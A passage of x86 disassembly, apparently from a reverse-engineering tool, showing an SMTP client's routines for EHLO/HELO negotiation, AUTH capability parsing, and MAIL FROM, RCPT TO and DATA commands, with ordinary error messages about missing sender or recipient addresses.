mov edx, ecx
shr ecx, 2
mov esi, offset dword_424600
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov byte ptr [eax+ebp], 0
mov eax, [esp+454h+arg_8]
push eax
lea ecx, [esp+458h+var_444]
mov [esp+458h+var_440], ebp
call sub_4120B0
push offset word_42465C
call ebx ; lstrlen
mov ecx, [esp+454h+var_440]
mov esi, eax
lea ebp, [ecx+esi]
lea edx, [ebp+1]
push edx
lea ecx, [esp+458h+var_444]
call sub_412000
mov eax, [esp+454h+var_444]
mov edx, [esp+454h+var_440]
mov ecx, esi
lea edi, [edx+eax]
mov edx, ecx
shr ecx, 2
mov esi, offset word_42465C
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov byte ptr [eax+ebp], 0
lea eax, [esp+454h+var_210]
push eax
mov [esp+458h+var_440], ebp
call ebx ; lstrlen
mov esi, eax
add ebp, esi
lea ecx, [ebp+1]
push ecx
lea ecx, [esp+458h+var_444]
call sub_412000
mov eax, [esp+454h+var_444]
mov edx, [esp+454h+var_440]
mov ecx, esi
lea edi, [edx+eax]
mov edx, ecx
shr ecx, 2
lea esi, [esp+454h+var_210]
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov byte ptr [eax+ebp], 0
lea eax, [esp+454h+var_410]
push eax
mov [esp+458h+var_440], ebp
call ebx ; lstrlen
mov esi, eax
add ebp, esi
lea ecx, [ebp+1]
push ecx
lea ecx, [esp+458h+var_444]
call sub_412000
mov ebx, [esp+454h+var_444]
mov ecx, esi
lea esi, [esp+454h+var_410]
mov edx, [esp+454h+var_440]
mov eax, ecx
shr ecx, 2
lea edi, [edx+ebx]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov byte ptr [ebx+ebp], 0
mov eax, [esp+454h+var_424]
test eax, eax
mov esi, ebp
mov [esp+454h+var_440], esi
mov byte_430AC0, 1
mov byte ptr [esp+454h+var_4], 1
jz short loc_412B43
push eax
call sub_41930D
add esp, 4
loc_412B43: ; CODE XREF: sub_412860+2D8�j
mov ecx, [esp+454h+arg_20]
mov edx, [esp+454h+var_438]
mov [ecx], edx
mov al, byte_42BD78
test al, al
jz short loc_412B7B
cmp ebp, 2
jbe short loc_412B7B
cmp byte ptr [ebx+ebp-3], 0Ah
jz short loc_412B7B
push offset word_42465C
lea ecx, [esp+458h+var_444]
call sub_4120B0
mov esi, [esp+454h+var_440]
mov ebx, [esp+454h+var_444]
loc_412B7B: ; CODE XREF: sub_412860+2F7�j
; sub_412860+2FC�j ...
mov ebp, [esp+454h+arg_0]
mov eax, [ebp+4]
add eax, esi
mov [esp+454h+var_418], eax
inc eax
push eax
mov ecx, ebp
call sub_412000
mov eax, [ebp+4]
mov edi, [ebp+0]
mov ecx, esi
add edi, eax
mov eax, ecx
shr ecx, 2
mov esi, ebx
rep movsd
mov ecx, eax
mov eax, [esp+454h+var_418]
and ecx, 3
rep movsb
mov ecx, [ebp+0]
mov byte ptr [eax+ecx], 0
mov ecx, [esp+454h+var_428]
mov [ebp+4], eax
jmp short loc_412BC9
; ---------------------------------------------------------------------------
loc_412BC2: ; CODE XREF: sub_412860+94�j
mov ebp, [esp+454h+arg_0]
loc_412BC9: ; CODE XREF: sub_412860+360�j
mov edx, [esp+454h+arg_C]
mov edi, [esp+454h+arg_10]
mov eax, [edi]
sub ecx, edx
mov esi, ecx
cmp esi, eax
jbe short loc_412BE3
mov esi, eax
loc_412BE3: ; CODE XREF: sub_412860+37F�j
lea edx, [esi+1]
push edx
lea ecx, [esp+458h+var_434]
call sub_412000
cmp esi, [esp+454h+var_42C]
jnb short loc_412BFA
mov [esp+454h+var_430], esi
loc_412BFA: ; CODE XREF: sub_412860+394�j
mov eax, [esp+454h+var_434]
mov ecx, [esp+454h+arg_24]
push esi
push eax
push ecx
call sub_4045F0
mov eax, [esp+460h+var_438]
add esp, 0Ch
cmp eax, 2
jnz short loc_412C39
push 1
push 1
lea edx, [esp+45Ch+var_434]
push ebp
push edx
call sub_4156E0
mov ecx, [esp+464h+var_434]
mov eax, [esp+464h+var_414]
add esp, 10h
sub eax, ecx
mov [edi], eax
jmp short loc_412C3D
; ---------------------------------------------------------------------------
loc_412C39: ; CODE XREF: sub_412860+3B7�j
mov ecx, [esp+454h+var_434]
loc_412C3D: ; CODE XREF: sub_412860+3D7�j
test ecx, ecx
mov byte ptr [esp+454h+var_4], 0
pop edi
jz short loc_412C53
push ecx
call sub_41930D
add esp, 4
loc_412C53: ; CODE XREF: sub_412860+3E8�j
test ebx, ebx
mov [esp+450h+var_4], 0FFFFFFFFh
jz short loc_412C6B
push ebx
call sub_41930D
add esp, 4
loc_412C6B: ; CODE XREF: sub_412860+400�j
mov ecx, [esp+450h+var_C]
pop esi
pop ebp
mov large fs:0, ecx
mov ecx, [esp+448h+var_10]
xor eax, eax
pop ebx
call sub_4192B6
add esp, 444h
retn
sub_412860 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_412CA0 proc near ; CODE XREF: sub_413410+11D�p
; sub_413410+286�p
var_82C = dword ptr -82Ch
var_828 = dword ptr -828h
var_824 = byte ptr -824h
var_820 = dword ptr -820h
var_81C = dword ptr -81Ch
var_818 = dword ptr -818h
var_814 = dword ptr -814h
var_810 = byte ptr -810h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push 0FFFFFFFFh
push offset SEH_412CA0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 820h
mov eax, dword_42A290
push ebx
push ebp
xor ebp, ebp
push esi
mov [esp+838h+var_10], eax
push edi
mov esi, ecx
mov ebx, edx
mov [esp+83Ch+var_820], ebp
mov [esp+83Ch+var_81C], ebp
mov [esp+83Ch+var_818], ebp
cmp ebx, ebp
mov [esp+83Ch+var_4], ebp
jz short loc_412CEF
cmp byte ptr [ebx], 0
jnz short loc_412CEF
xor ebx, ebx
loc_412CEF: ; CODE XREF: sub_412CA0+46�j
; sub_412CA0+4B�j
call sub_4139F0
xor ecx, ecx
cmp eax, ebp
mov [esp+83Ch+var_814], eax
mov [esp+83Ch+var_828], ecx
jle loc_412F2C
loc_412D06: ; CODE XREF: sub_412CA0+286�j
cmp ecx, ebp
jz short loc_412D15
push 3E8h
call dword_42408C ; Sleep
loc_412D15: ; CODE XREF: sub_412CA0+68�j
cmp esi, ebp
jnz short loc_412D5D
mov eax, off_429FD0
push offset aSmtp ; "smtp"
push eax
push offset dword_42BD80
push offset byte_42B740
call sub_4137C0
add esp, 10h
cmp eax, ebp
jnz loc_412F17
lea ecx, [esp+83Ch+var_824]
push ecx
push ebp
call sub_413B10
add esp, 8
cmp eax, 0DCh
jz short loc_412D5D
call sub_413870
jmp loc_412F17
; ---------------------------------------------------------------------------
loc_412D5D: ; CODE XREF: sub_412CA0+77�j
; sub_412CA0+B1�j
cmp ebx, ebp
mov eax, offset byte_4306A8
jz short loc_412D68
mov eax, ebx
loc_412D68: ; CODE XREF: sub_412CA0+C4�j
push eax
lea edx, [esp+840h+var_810]
push offset aEhloS ; "EHLO %s"
push edx
call sub_419B8A
push 40h
push offset byte_42AFF8
call sub_41A6D0
add esp, 14h
cmp eax, ebp
jz short loc_412DE1
lea edi, [esp+83Ch+var_810]
dec edi
loc_412D90: ; CODE XREF: sub_412CA0+F6�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_412D90
mov cx, word_4243EC
inc eax
mov [edi], cx
mov edx, eax
loc_412DA5: ; CODE XREF: sub_412CA0+10A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_412DA5
lea edi, [esp+83Ch+var_810]
sub eax, edx
dec edi
loc_412DB3: ; CODE XREF: sub_412CA0+119�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_412DB3
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
lea edx, [esp+83Ch+var_810]
and ecx, 3
push 3Eh
push edx
rep movsb
call sub_41A3F0
add esp, 8
cmp eax, ebp
jz short loc_412DE1
mov byte ptr [eax], 0
loc_412DE1: ; CODE XREF: sub_412CA0+E9�j
; sub_412CA0+13C�j
lea edi, [esp+83Ch+var_810]
dec edi
loc_412DE6: ; CODE XREF: sub_412CA0+14C�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_412DE6
mov ax, word_42465C
mov cl, byte_42465E
mov [edi], ax
mov eax, dword_430AA8
lea edx, [esp+83Ch+var_810]
push edx
push eax
mov [edi+2], cl
call sub_4138B0
add esp, 8
cmp eax, ebp
jnz loc_412F10
lea ecx, [esp+83Ch+var_824]
push ecx
lea edx, [esp+840h+var_820]
push edx
call sub_413B10
add esp, 8
cmp eax, 0FAh
jz loc_412F5E
cmp ebx, ebp
mov eax, offset byte_4306A8
jz short loc_412E43
mov eax, ebx
loc_412E43: ; CODE XREF: sub_412CA0+19F�j
push eax
lea eax, [esp+840h+var_810]
push offset aHeloS ; "HELO %s"
push eax
call sub_419B8A
push 40h
push offset byte_42AFF8
call sub_41A6D0
add esp, 14h
cmp eax, ebp
jz short loc_412EC1
lea edi, [esp+83Ch+var_810]
dec edi
jmp short loc_412E70
; ---------------------------------------------------------------------------
align 10h
loc_412E70: ; CODE XREF: sub_412CA0+1CB�j
; sub_412CA0+1D6�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_412E70
mov cx, word_4243EC
inc eax
mov [edi], cx
mov edx, eax
loc_412E85: ; CODE XREF: sub_412CA0+1EA�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_412E85
lea edi, [esp+83Ch+var_810]
sub eax, edx
dec edi
loc_412E93: ; CODE XREF: sub_412CA0+1F9�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_412E93
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
lea edx, [esp+83Ch+var_810]
and ecx, 3
push 3Eh
push edx
rep movsb
call sub_41A3F0
add esp, 8
cmp eax, ebp
jz short loc_412EC1
mov byte ptr [eax], 0
loc_412EC1: ; CODE XREF: sub_412CA0+1C4�j
; sub_412CA0+21C�j
lea edi, [esp+83Ch+var_810]
dec edi
loc_412EC6: ; CODE XREF: sub_412CA0+22C�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_412EC6
mov ax, word_42465C
mov cl, byte_42465E
mov [edi], ax
mov eax, dword_430AA8
lea edx, [esp+83Ch+var_810]
push edx
push eax
mov [edi+2], cl
call sub_4138B0
add esp, 8
test eax, eax
jnz short loc_412F10
lea ecx, [esp+83Ch+var_824]
push ecx
push ebp
call sub_413B10
add esp, 8
cmp eax, 0FAh
jz loc_413067
loc_412F10: ; CODE XREF: sub_412CA0+175�j
; sub_412CA0+255�j
call sub_413870
xor esi, esi
loc_412F17: ; CODE XREF: sub_412CA0+98�j
; sub_412CA0+B8�j
mov ecx, [esp+83Ch+var_828]
mov eax, [esp+83Ch+var_814]
inc ecx
cmp ecx, eax
mov [esp+83Ch+var_828], ecx
jl loc_412D06
loc_412F2C: ; CODE XREF: sub_412CA0+60�j
mov ebp, [esp+83Ch+var_820]
loc_412F30: ; CODE XREF: sub_412CA0+3D2�j
mov ecx, [esp+83Ch+var_814]
cmp [esp+83Ch+var_828], ecx
mov [esp+83Ch+var_4], 0FFFFFFFFh
jnz loc_413077
test ebp, ebp
jz short loc_412F56
push ebp
call sub_41930D
add esp, 4
loc_412F56: ; CODE XREF: sub_412CA0+2AB�j
or eax, 0FFFFFFFFh
jmp loc_413086
; ---------------------------------------------------------------------------
loc_412F5E: ; CODE XREF: sub_412CA0+192�j
mov ebp, [esp+83Ch+var_820]
cmp byte ptr [ebp+0], 0
jz loc_41306B
lea esp, [esp+0]
loc_412F70: ; CODE XREF: sub_412CA0+3C1�j
push ebp
call sub_419A76
mov al, [ebp+3]
add esp, 4
cmp al, 2Dh
jz short loc_412F88
cmp al, 20h
jnz loc_413048
loc_412F88: ; CODE XREF: sub_412CA0+2DE�j
mov eax, [ebp+4]
mov edx, offset aAuth ; "auth"
cmp eax, [edx]
jnz loc_413048
mov al, [ebp+8]
cmp al, 20h
jz short loc_412FA7
cmp al, 3Dh
jnz loc_413048
loc_412FA7: ; CODE XREF: sub_412CA0+2FD�j
mov ecx, 9
lea esp, [esp+0]
loc_412FB0: ; CODE XREF: sub_412CA0+3A2�j
mov al, [ecx+ebp]
test al, al
lea esi, [ecx+ebp]
mov edx, ecx
mov [esp+83Ch+var_82C], esi
jz short loc_412FD1
loc_412FC0: ; CODE XREF: sub_412CA0+32F�j
cmp al, 2Ch
jz short loc_412FD1
cmp al, 20h
jz short loc_412FD1
mov al, [edx+ebp+1]
inc edx
test al, al
jnz short loc_412FC0
loc_412FD1: ; CODE XREF: sub_412CA0+31E�j
; sub_412CA0+322�j ...
mov eax, edx
sub eax, ecx
cmp eax, 5
jnz short loc_41300D
mov ecx, eax
mov edi, offset dword_4245F0
xor ebx, ebx
repe cmpsb
jnz short loc_412FEE
mov byte_43069E, 1
loc_412FEE: ; CODE XREF: sub_412CA0+345�j
mov esi, [esp+83Ch+var_82C]
mov ecx, 5
mov edi, offset aLogin ; "login"
xor ebx, ebx
repe cmpsb
mov esi, [esp+83Ch+var_82C]
jnz short loc_41300D
mov byte_43069F, 1
loc_41300D: ; CODE XREF: sub_412CA0+338�j
; sub_412CA0+364�j
cmp eax, 8
jnz short loc_413029
mov ecx, 2
mov edi, offset dword_424664
xor eax, eax
repe cmpsd
jnz short loc_413029
mov byte_43069D, 1
loc_413029: ; CODE XREF: sub_412CA0+370�j
; sub_412CA0+380�j
mov ecx, edx
jmp short loc_413030
; ---------------------------------------------------------------------------
align 10h
loc_413030: ; CODE XREF: sub_412CA0+38B�j
; sub_412CA0+39C�j
mov al, [ecx+ebp]
cmp al, 2Ch
jz short loc_41303B
cmp al, 20h
jnz short loc_41303E
loc_41303B: ; CODE XREF: sub_412CA0+395�j
inc ecx
jmp short loc_413030
; ---------------------------------------------------------------------------
loc_41303E: ; CODE XREF: sub_412CA0+399�j
cmp byte ptr [ecx+ebp], 0
jnz loc_412FB0
loc_413048: ; CODE XREF: sub_412CA0+2E2�j
; sub_412CA0+2F2�j ...
mov eax, ebp
lea edx, [eax+1]
lea ecx, [ecx+0]
loc_413050: ; CODE XREF: sub_412CA0+3B5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413050
sub eax, edx
lea ebp, [eax+ebp+1]
cmp byte ptr [ebp+0], 0
jnz loc_412F70
loc_413067: ; CODE XREF: sub_412CA0+26A�j
mov ebp, [esp+83Ch+var_820]
loc_41306B: ; CODE XREF: sub_412CA0+2C6�j
mov byte_43069F, 1
jmp loc_412F30
; ---------------------------------------------------------------------------
loc_413077: ; CODE XREF: sub_412CA0+2A3�j
test ebp, ebp
jz short loc_413084
push ebp
call sub_41930D
add esp, 4
loc_413084: ; CODE XREF: sub_412CA0+3D9�j
xor eax, eax
loc_413086: ; CODE XREF: sub_412CA0+2B9�j
mov ecx, [esp+83Ch+var_C]
pop edi
pop esi
pop ebp
mov large fs:0, ecx
mov ecx, [esp+830h+var_10]
pop ebx
call sub_4192B6
add esp, 82Ch
retn
sub_412CA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4130B0 proc near ; CODE XREF: sub_413410+296�p
var_830 = dword ptr -830h
var_82C = dword ptr -82Ch
var_828 = dword ptr -828h
var_824 = dword ptr -824h
var_820 = dword ptr -820h
var_81C = dword ptr -81Ch
var_818 = dword ptr -818h
var_814 = byte ptr -814h
var_810 = byte ptr -810h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
push 0FFFFFFFFh
push offset SEH_4130B0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 824h
mov eax, dword_42A290
push ebx
push ebp
mov [esp+838h+var_10], eax
xor eax, eax
push esi
push edi
mov [esp+840h+var_820], eax
mov [esp+840h+var_81C], eax
mov [esp+840h+var_818], eax
mov [esp+840h+var_4], eax
mov [esp+840h+var_830], eax
mov [esp+840h+var_82C], eax
mov [esp+840h+var_828], eax
push offset byte_42B958
mov byte ptr [esp+844h+var_4], 1
call dword_424094 ; lstrlen
mov ebp, eax
lea ebx, [ebp+1]
push ebx
lea ecx, [esp+844h+var_830]
call sub_412000
mov eax, [esp+840h+var_830]
mov edx, [esp+840h+var_82C]
lea edi, [edx+eax]
mov ecx, ebp
mov edx, ecx
shr ecx, 2
mov esi, offset byte_42B958
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov byte ptr [eax+ebp], 0
lea eax, [ebx+1]
push eax
lea ecx, [esp+844h+var_830]
mov [esp+844h+var_82C], ebp
call sub_412000
mov esi, [esp+840h+var_830]
mov ecx, [esp+840h+var_82C]
xor al, al
mov [ecx+esi], al
mov [ebx+esi], al
mov [esp+840h+var_82C], ebx
xor ebx, ebx
cmp esi, ebx
jnz short loc_413177
push offset aNoEmailAddress ; "No email address was found for the send"...
jmp loc_41320D
; ---------------------------------------------------------------------------
loc_413177: ; CODE XREF: sub_4130B0+BB�j
cmp byte ptr [esi], 3Ch
push esi
jnz short loc_413189
push offset aMailFromS_0 ; "MAIL FROM:%s"
lea edx, [esp+848h+var_810]
push edx
jmp short loc_413193
; ---------------------------------------------------------------------------
loc_413189: ; CODE XREF: sub_4130B0+CB�j
push offset aMailFromS ; "MAIL FROM:<%s>"
lea eax, [esp+848h+var_810]
push eax
loc_413193: ; CODE XREF: sub_4130B0+D7�j
call sub_419B8A
add esp, 0Ch
push esi
mov [esp+844h+var_82C], ebx
call sub_41930D
lea edi, [esp+844h+var_810]
add esp, 4
mov [esp+840h+var_830], ebx
mov [esp+840h+var_828], ebx
dec edi
loc_4131B5: ; CODE XREF: sub_4130B0+10B�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_4131B5
mov cx, word_42465C
mov dl, byte_42465E
mov [edi], cx
mov ecx, dword_430AA8
lea eax, [esp+840h+var_810]
push eax
push ecx
mov [edi+2], dl
call sub_4138B0
add esp, 8
test eax, eax
jz short loc_4131F3
mov eax, [esp+840h+var_820]
cmp eax, ebx
jmp loc_4133AC
; ---------------------------------------------------------------------------
loc_4131F3: ; CODE XREF: sub_4130B0+136�j
lea edx, [esp+840h+var_814]
push edx
push ebx
call sub_413B10
add esp, 8
cmp eax, 0FAh
jz short loc_41323B
push offset aTheSmtpServerD ; "The SMTP server does not like the sende"...
loc_41320D: ; CODE XREF: sub_4130B0+C2�j
call sub_4141F0
mov eax, [esp+844h+var_820]
add esp, 4
cmp eax, ebx
mov [esp+840h+var_4], 0FFFFFFFFh
jz short loc_4132A1
push eax
call sub_41930D
add esp, 4
mov eax, 0FFFFFFFEh
jmp loc_4133E5
; ---------------------------------------------------------------------------
loc_41323B: ; CODE XREF: sub_4130B0+156�j
mov eax, [esp+840h+arg_0]
push eax
lea ecx, [esp+844h+var_830]
call sub_4120B0
mov esi, [esp+840h+var_82C]
xor bl, bl
inc esi
lea ecx, [esi+1]
push ecx
lea ecx, [esp+844h+var_830]
call sub_412000
mov ebp, [esp+840h+var_830]
mov edx, [esp+840h+var_82C]
xor edi, edi
cmp ebp, edi
mov [edx+ebp], bl
mov [esi+ebp], bl
mov [esp+840h+var_82C], esi
jnz short loc_4132AB
push offset aNoEmailAddre_0 ; "No email address was found for recipien"...
call sub_4141F0
mov eax, [esp+844h+var_820]
add esp, 4
cmp eax, edi
mov [esp+840h+var_4], 0FFFFFFFFh
jz short loc_4132A1
push eax
call sub_41930D
add esp, 4
loc_4132A1: ; CODE XREF: sub_4130B0+176�j
; sub_4130B0+1E6�j
mov eax, 0FFFFFFFEh
jmp loc_4133E5
; ---------------------------------------------------------------------------
loc_4132AB: ; CODE XREF: sub_4130B0+1C6�j
mov al, [ebp+0]
xor ebx, ebx
test al, al
mov [esp+840h+var_824], edi
mov esi, ebp
jz loc_413348
mov edi, edi
loc_4132C0: ; CODE XREF: sub_4130B0+290�j
push esi
lea eax, [esp+844h+var_810]
push offset aRcptToS ; "RCPT TO:<%s>"
push eax
call sub_419B8A
lea edi, [esp+84Ch+var_810]
add esp, 0Ch
dec edi
loc_4132D8: ; CODE XREF: sub_4130B0+22E�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_4132D8
mov cx, word_42465C
mov dl, byte_42465E
mov [edi], cx
mov ecx, dword_430AA8
lea eax, [esp+840h+var_810]
push eax
push ecx
mov [edi+2], dl
call sub_4138B0
lea edx, [esp+848h+var_814]
push edx
lea eax, [esp+84Ch+var_820]
push eax
inc ebx
call sub_413B10
add esp, 10h
cmp eax, 0FAh
jz short loc_413329
cmp eax, 0FBh
jz short loc_413329
inc [esp+840h+var_824]
loc_413329: ; CODE XREF: sub_4130B0+26C�j
; sub_4130B0+273�j
mov eax, esi
lea edx, [eax+1]
mov edi, edi
loc_413330: ; CODE XREF: sub_4130B0+285�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413330
sub eax, edx
lea esi, [esi+eax+1]
cmp byte ptr [esi], 0
jnz loc_4132C0
xor edi, edi
loc_413348: ; CODE XREF: sub_4130B0+208�j
push ebp
mov [esp+844h+var_82C], edi
call sub_41930D
mov eax, [esp+844h+var_824]
add esp, 4
cmp eax, ebx
mov [esp+840h+var_830], edi
mov [esp+840h+var_828], edi
jnz short loc_41336C
call sub_4141C0
jmp short loc_4133A6
; ---------------------------------------------------------------------------
loc_41336C: ; CODE XREF: sub_4130B0+2B3�j
mov ecx, dword_430AA8
push offset aData ; "DATA\r\n"
push ecx
call sub_4138B0
add esp, 8
test eax, eax
jnz short loc_4133A6
lea edx, [esp+840h+var_814]
push edx
push edi
call sub_413B10
add esp, 8
cmp eax, 162h
jz short loc_4133C7
push offset aSmtpServerErro ; "SMTP server error accepting message dat"...
call sub_4141F0
add esp, 4
loc_4133A6: ; CODE XREF: sub_4130B0+2BA�j
; sub_4130B0+2D2�j
mov eax, [esp+840h+var_820]
cmp eax, edi
loc_4133AC: ; CODE XREF: sub_4130B0+13E�j
mov [esp+840h+var_4], 0FFFFFFFFh
jz short loc_4133C2
push eax
call sub_41930D
add esp, 4
loc_4133C2: ; CODE XREF: sub_4130B0+307�j
or eax, 0FFFFFFFFh
jmp short loc_4133E5
; ---------------------------------------------------------------------------
loc_4133C7: ; CODE XREF: sub_4130B0+2E7�j
mov eax, [esp+840h+var_820]
cmp eax, edi
mov [esp+840h+var_4], 0FFFFFFFFh
jz short loc_4133E3
push eax
call sub_41930D
add esp, 4
loc_4133E3: ; CODE XREF: sub_4130B0+328�j
xor eax, eax
loc_4133E5: ; CODE XREF: sub_4130B0+186�j
; sub_4130B0+1F6�j ...
mov ecx, [esp+840h+var_C]
pop edi
pop esi
pop ebp
mov large fs:0, ecx
mov ecx, [esp+834h+var_10]
pop ebx
call sub_4192B6
add esp, 830h
retn
sub_4130B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_413410 proc near ; CODE XREF: sub_412210+4C8�p
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
arg_1C = dword ptr 20h
arg_20 = dword ptr 24h
push 0FFFFFFFFh
push offset SEH_413410
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 98h
push ebx
xor ebx, ebx
mov [esp+0A8h+var_A4], ebx
mov [esp+0A8h+var_A0], ebx
mov [esp+0A8h+var_9C], ebx
mov [esp+0A8h+var_4], ebx
mov [esp+0A8h+var_98], ebx
mov [esp+0A8h+var_94], ebx
mov [esp+0A8h+var_90], ebx
mov [esp+0A8h+var_7C], ebx
mov [esp+0A8h+var_78], ebx
mov [esp+0A8h+var_74], ebx
mov [esp+0A8h+var_88], ebx
mov [esp+0A8h+var_84], ebx
mov [esp+0A8h+var_80], ebx
mov [esp+0A8h+var_60], ebx
mov [esp+0A8h+var_5C], ebx
mov [esp+0A8h+var_58], ebx
cmp byte_42B740, bl
mov byte ptr [esp+0A8h+var_4], 4
jz loc_4137A2
cmp dword_4304F8, ebx
jz loc_4137A2
lea eax, [esp+0A8h+var_A4]
lea edx, [esp+0A8h+var_7C]
push ebp
mov [esp+0ACh+var_50], eax
lea ecx, [esp+0ACh+var_88]
mov [esp+0ACh+var_48], edx
mov edx, [esp+0ACh+arg_8]
mov [esp+0ACh+var_4C], ecx
mov ecx, [esp+0ACh+arg_4]
push esi
mov esi, [esp+0B0h+arg_C]
lea eax, [esp+0B0h+var_98]
push edi
mov edi, [esp+0B4h+arg_14]
mov [esp+0B4h+var_44], eax
mov eax, [esp+0B4h+arg_10]
mov [esp+0B4h+var_38], edx
mov [esp+0B4h+var_3C], ecx
mov edx, offset byte_42B238
xor ecx, ecx
mov [esp+0B4h+var_40], 1
mov [esp+0B4h+var_34], esi
mov [esp+0B4h+var_30], eax
mov [esp+0B4h+var_2C], edx
mov [esp+0B4h+var_28], offset byte_42B740
mov [esp+0B4h+var_18], edi
mov dword_430698, ebx
mov byte_43069F, bl
mov byte_43069E, bl
mov byte_43069C, bl
call sub_412CA0
mov ebp, eax
cmp ebp, ebx
jnz loc_413721
lea ecx, [esp+0B4h+var_50]
push esi
push ecx
mov [esp+0BCh+var_8C], 1
mov byte_430AC0, bl
mov [esp+0BCh+var_24], ebx
mov [esp+0BCh+var_20], ebx
mov [esp+0BCh+var_1C], ebx
mov [esp+0BCh+var_18], ebx
mov [esp+0BCh+var_10], ebx
mov [esp+0BCh+var_14], ebx
call sub_414690
mov edx, [esp+0BCh+arg_1C]
mov ecx, [esp+0BCh+arg_0]
push edx
push ebx
push ebx
push ebx
push esi
push 1
lea eax, [esp+0D4h+var_98]
push eax
push ecx
lea edx, [esp+0DCh+var_A4]
push edx
call sub_415460
mov ebp, eax
add esp, 2Ch
cmp ebp, ebx
jnz loc_413721
or eax, 0FFFFFFFFh
cmp edi, ebx
mov [esp+0B4h+var_54], eax
mov [esp+0B4h+var_64], eax
jz short loc_4135EA
mov eax, [esp+0B4h+arg_20]
push eax
lea ecx, [esp+0B8h+var_54]
push ecx
push ebx
push 1
push 1
lea edx, [esp+0C8h+var_64]
push edx
push ebx
push esi
lea eax, [esp+0D4h+var_A4]
push 1
push eax
call sub_412860
add esp, 28h
mov ebp, eax
loc_4135EA: ; CODE XREF: sub_413410+1AE�j
push esi
lea ecx, [esp+0B8h+var_A4]
push 1
push ecx
call sub_415690
add esp, 0Ch
cmp ebp, ebx
jnz loc_413721
mov edx, dword_4304F4
push edx
lea ecx, [esp+0B8h+var_60]
call sub_4120B0
mov ecx, [esp+0B4h+var_60]
cmp ecx, ebx
jz short loc_413636
cmp [ecx], bl
jz short loc_413636
mov edi, edi
loc_413620: ; CODE XREF: sub_413410+224�j
mov eax, ecx
lea esi, [eax+1]
loc_413625: ; CODE XREF: sub_413410+21A�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_413625
sub eax, esi
lea ecx, [ecx+eax+1]
cmp [ecx], bl
jnz short loc_413620
loc_413636: ; CODE XREF: sub_413410+208�j
; sub_413410+20C�j
mov [esp+0B4h+var_70], ebx
mov [esp+0B4h+var_68], ebx
cmp dword_430694, ebx
mov byte ptr [esp+0B4h+var_4], 5
mov [esp+0B4h+var_6C], ebx
jg short loc_413660
push offset dword_4304F4
lea ecx, [esp+0B8h+var_70]
call sub_412810
loc_413660: ; CODE XREF: sub_413410+240�j
call sub_4139F0
mov edi, eax
mov esi, 1
lea esp, [esp+0]
loc_413670: ; CODE XREF: sub_413410+2DD�j
cmp esi, edi
jle short loc_413679
cmp edi, 0FFFFFFFFh
jnz short loc_4136EF
loc_413679: ; CODE XREF: sub_413410+262�j
cmp esi, 1
jle short loc_413689
push 3A98h
call dword_42408C ; Sleep
loc_413689: ; CODE XREF: sub_413410+26C�j
cmp [esp+0B4h+var_8C], ebx
jnz short loc_41369D
xor ecx, ecx
mov edx, offset byte_42B238
call sub_412CA0
mov ebp, eax
loc_41369D: ; CODE XREF: sub_413410+27D�j
cmp ebp, ebx
jnz short loc_4136D4
mov eax, [esp+0B4h+var_70]
push eax
call sub_4130B0
mov ebp, eax
add esp, 4
cmp ebp, ebx
jnz short loc_4136D4
mov ecx, [esp+0B4h+var_A4]
push ebx
push 0FAh
push ecx
call sub_414220
mov ebp, eax
add esp, 0Ch
cmp ebp, ebx
jnz short loc_4136E3
call sub_4141C0
jmp short loc_4136D9
; ---------------------------------------------------------------------------
loc_4136D4: ; CODE XREF: sub_413410+28F�j
; sub_413410+2A2�j
cmp ebp, 0FFFFFFFEh
